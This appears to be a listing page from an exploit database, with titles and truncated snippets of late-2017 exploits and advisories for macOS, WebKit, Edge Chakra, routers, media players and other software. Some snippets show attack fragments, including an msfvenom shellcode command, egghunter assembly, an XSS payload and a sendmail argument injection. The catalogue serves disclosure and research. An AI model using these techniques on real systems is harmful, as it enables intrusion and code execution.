47904 matches found
Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation
Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235 "Dear @AppleSupport, we noticed a HUGE security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware ...
Synology StorageManager 5.2 - Root Remote Command Execution
''' SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution Full report: https://blogs.securiteam.com/index.php/archives/3540 Twitter: @SecuriTeamSSD Weibo: SecuriTeamSSD Vulnerability Summary The following advisory describes a remote command execution vulnerability found in...
Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download
''' Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name...
HP iMC Plat 7.2 - Remote Code Execution
!/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE Date: 11-28-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal
Exploit Title: WordPress woocommerce directory traversal Date: 28-11-2017 Software Link: https://wordpress.org/plugins/woocommerce/ Exploit Author:fu2x2000 Contact: [email protected] Website: CVE:2017-17058 Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 Category: webapps 1. Description...
Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
/ EDB Note Source https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d Source https://blog.xpnsec.com/windows-warbird-privesc/ Source https://github.com/xpn/warbirdexploit Ref https://bugs.chromium.org/p/project-zero/issues/detail?id=1391 / //...
ZTE ZXDSL 831CII - Improper Access Restrictions
Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access Date: 27/11/2017 Exploit Author: Ibad Shah Vendor Homepage: zte.com.cn Software Link: - Version: - ZXDSL - 831CII Tested on: Windows 10 CVE :- 2017-16953 ======================================= The Router usually servers html files &...
Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367 In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x ". This bug may lead to type confusion in JITed code...
Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366 Here's a snippet of Inline::Optimize. FOREACHINSTREDITINGinstr, instrNext, func-mheadInstr switch instr-mopcode case Js::OpCode::Label: ... if instr-AsLabelInstr-misForInExit Assertthis-currentForInDepth != 0; // The PoC hit...
ALLPlayer 7.5 - Denial of-Service (PoC)
!/usr/bin/python buffer = b"http://" buffer += b"\x41" 1500 f=open"player.m3u","wb" f.writebuffer f.close...
Exim 4.89 - 'BDAT' Denial of Service
While parsing BDAT data header, exim still scans for '.' and consider it the end of mail. https://github.com/Exim/exim/blob/master/src/src/receive.cL1867 Exim goes into an incorrect state after this message is sent because the function pointer receivegetc is not reset. If the following command is...
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1365 Some background: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 There's one more place that emits a BailOnNotObject opcode. Here's a snippet of GlobOpt::OptTagChecks. if valueType.CanBeTaggedValue &&...
Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364 1. In the Chakra's JIT compilation process, it stores variables' type information by basic block. function optb let o; if b // BASIC BLOCK a o = ; else // BASIC BLOCK b o = 1.1; // BASIC BLOCK c return o; For example, let's...
Diving Log 6.0 - XML External Entity Injection
Exploit Title: Diving Log 6.0 XXE Injection + Date: 27-11-2017 + Exploit Author: Trent Gordon + Vendor Homepage: http://www.divinglog.de + Software Link: http://www.divinglog.de/english/download/ + Disclosed at: https://thenopsled.com/divinglog.txt + Version: 6.0 + Tested on: Windows 7 SP1,...
ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Tested on: Windows 10 Professional x86 Exploit for previous version: https://www.exploit-db.com/exploits/42455/ Seems they haven't patched the vulnerability at all :D msfvenom -p windows/exec CMD="calc.exe" -e x86/unicodemixed BufferRegister=EAX -f python shellcode = "" shellcode...
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 I found the following bug with an AFL-based fuzzer: When walkpagerange is used on a VMHUGETLB VMA, callbacks from the mmwalk structure are only invoked for present pages. However, domincore assumes that it will always get...
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer information between the kernel and user-space processes. It...
Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)
Linux/x64 - Egghunter 0xbeefbeef Shellcode 34 bytes. Shellcode exploit for Linuxx86-64 platform global start section .text start: xor rsi,rsi push rsi ; starts the search at position 0 pop rdi nextpage: or di,0xfff inc rdi next4bytes: push 21 pop rax syscall cmp al,0xf2 jz nextpage mov...
WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1344 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function freememory var a;...
WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1348 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / max-height: 0;...
WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1350 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / /...
WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function jsfuzzer...
WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1347 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac...
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function go...
WebKit - 'WebCore::FormSubmission::create' Use-After-Free
function jsfuzzer textarea1.setRangeText"foo"; textarea2.autofocus = true; textarea1.name = "foo"; form.insertBeforetextarea2, form.firstChild; form.submit; function eventhandler2 forvar i=0;i a b !-- ================================================================= ASan log:...
WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free
.class9 column-span: all; function f document.execCommand"indent", false; var var00031 = window.getSelection.setBaseAndExtentsum,16,null,6; f; !-- ================================================================= ASan log: =================================================================...
Winamp Pro 5.66.Build.3512 - Denial of Service
!/usr/bin/perl Exploit Title: Winamp Pro .wav|.wmv|.au|.asf|.aiff|.aif Denial of Service Date: 2017-11-22 Exploit Author: R.Yavari Version: v5.66.Build.3512 Tested on: Windows 10 , Windows 7 other version should be affected CVE-2017-16951 http://meggamusic.co.uk/winamp/winamp5666fullen-usredux.ex...
WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free
function go iframe.name = "foo"; var form = document.createElement"form"; iframe.src = "data:text/html,foo"; form.submit; window.onbeforeunload = f; function f document.head.appendChilddel; ::get /Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0x45a...
WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free
function eventhandler1 try txt.appendChildkg; catche function eventhandler2 try anim.appendChildkg; catche function eventhandler3 try table.scrollIntoViewtrue; catche a !-- ================================================================= ASan log:...
WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1349 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / border-bottom: green...
KMPlayer 4.2.2.4 - Denial of Service
!/usr/bin/perl Exploit Title: KMPlayer .nsv Denial of Service Date: 2017-11-22 Exploit Author: R.Yavari Version: v4.2.2.4 Tested on: Windows 10 , Windows 7 other version should be affected NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the...
DblTek - Multiple Vulnerabilities
Vulnerabilities summary The following advisory describes 2 two vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...
Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1361 We have discovered that the nt!NtQueryDirectoryFile system call discloses portions of uninitialized pool memory to user-mode clients on Windows 10, due to uninitialized fields in the output structure being copied to the...
Vonage VDV-23 - Denial of Service
Overview During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is...
Microsoft Office - OLE Remote Code Execution
Source: https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research:...
Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1332 Windows: CiSetFileCache TOCTOU Security Feature Bypass Platform: Windows 10 10586/14393/10S not tested 8.1 Update 2 or Windows 7 Class: Security Feature Bypass Summary: It’s possible to add a cached signing level to an unsigne...
iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service
Exploit Title: TpwnT - iOS Denail of Service POC Date: 10-31-2017 Exploit Author: Russian Otter Ro Vendor Homepage: https://support.apple.com/en-us/HT208222 Version: 2.1 Tested on: iOS 10.3.2 - 11.1 CVE: CVE-2017-13849 """ ------------------------- CVE-2017-13849 TpwnT by Ro of SavSec...
Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting
Exploit Title: Icon Time Systems RTC-1000 alert"xss"; ========================================================== PROOF OF CONCEPT - With valid credentials that has permissions to modify the employee records, access the employeelist.html page via Lists-Employees...
Microsoft Edge Chakra JIT - Type Confusion with switch Statements
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3 Let's start with a switch statement and its IR code for JIT. JS: for let i = 0; i ; 100; i++ switch i case 2: case 4: case 6: case 8: case 10: case 12: case 14: case 16: case 18: case 20: case 22: case 24: case 26: ca...
Zeta Components Mail 1.8.1 - Remote Code Execution
Vendor: Zeta Components module: Mail, returnPath-email”; If attacker assign email address like: '[email protected] -X/var/www/html/cache/exploit.php' and inject payload in mail body, sendmail will transfer log-X into /var/www/html/cache/exploit.php. The resulting file will contain t...
VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)
!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version : 10.2.14 Tested on : Windows 7 x86 Description : VX...
LanSweeper 6.0.100.75 - Cross-Site Scripting
LanSweeper - Cross Site Scripting and HTMLi Title: Vulnerability in LanSweeper Date: 16-11-2017 Status: Vendor contacted, patch available Author: Miguel Mendez Z Vendor Homepage: http://www.lansweeper.com Version: 6.0.100.75 CVE: CVE-2017-16841 Vulnerability description -------------------------...
Microsoft Edge - 'Object.setPrototypeOf' Memory Corruption
,1::FindEntry+0x41: 00007fffe2b7c841 8b0c81 mov ecx,dword ptr rcx+rax4 ds:0000023b4a2ea4c4=???????? 0:015 k Child-SP RetAddr Call Site 00 000000be563fbba0 00007fffe2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary,1::FindEntry+0x41 01 000000be563fbbf0 00007fffe2e1f9a4...
Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343 Here's a snippet of the method. void Lowerer::LowerBoundCheckIR::Instr const instr ... ifrightOpnd-IsIntConstOpnd IntConstType newOffset; if!IntConstMath::Addoffset, rightOpnd-AsIntConstOpnd-GetValue, &newOffset --- a offset...
Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357 function opta, b, v if b.length b0 = ; return 0; ; printb0; main;...
TP-Link TL-WR740N - Cross-Site Scripting
Exploit Title: XSS Vuln - TP-LINK TL-WR740N Date: 15/11/2017 Exploit Author: bl00dy Vendor Homepage: http://www.tp-link.com Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n Tested on: Windows 8.1 Cross-site scripting XSS in TP-LINK TL-WR740N Proof of Concept: 1. Go to your wireless...
Vonage VDV23 - Cross-Site Scripting
Exploit Title: Vonage Home Router – Stored Xss Date: 16/11/2017 Exploit Author: Nu11By73 Hardware Version: VDV-23: 115 Software Version: 3.2.11-0.9.40 CVE : CVE-2017-16843 NewKeyword Parameter: 1. Login to the router 2. Click advanced setup 3. Click parental controls 4. In the block these keyword...
CommuniGatePro 6.1.16 - Cross-Site Scripting
Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...
Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow
Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser parser.addargument'--host', required=True args =...
PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free
X41 D-Sec GmbH Security Advisory: X41-2017-006 Multiple Vulnerabilities in PSFTPd Windows FTP Server ===================================================== Overview -------- Confirmed Affected Versions: 10.0.4 Build 729 Confirmed Patched Versions: None Vendor: Sergei Pleis Softwareentwicklung Vend...